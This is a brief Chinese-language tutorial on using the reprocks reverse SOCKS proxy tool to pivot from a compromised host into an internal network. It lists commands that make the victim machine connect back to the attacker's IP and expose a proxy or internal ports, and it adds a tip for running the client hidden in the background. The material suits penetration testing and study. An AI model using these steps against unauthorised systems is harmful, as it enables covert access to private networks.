内网渗透-边界穿透神器-reprocks

  • 在渗透过程中,总是会碰到如下的问题:

    • 我拿下了一台Windows/Linux,但是处于内网,又不能提权,我的目标是内网中的其他机器,此时怎么办?
  • 下载地址:https://github.com/RicterZ/reprocks

  • 一共三种用法:

    • 本机执行:server.py 8888 9999

    • 肉鸡执行:client.py -m 1 本机IP 8888 #这样就把socks5代理服务转出来了

    • 肉鸡执行:client.py -m 2 内网IP 内网端口 本机IP 8888 #这样就把内网别的端口服务转出来了

    • 肉鸡执行:client.py -m 3 7070 这样就只是在肉鸡上监听7070端口开启socks5代理服务

  • 技巧
    • 可以后台运行:
      • python client.py -m 1 8888 >> /dev/null 2> &1 &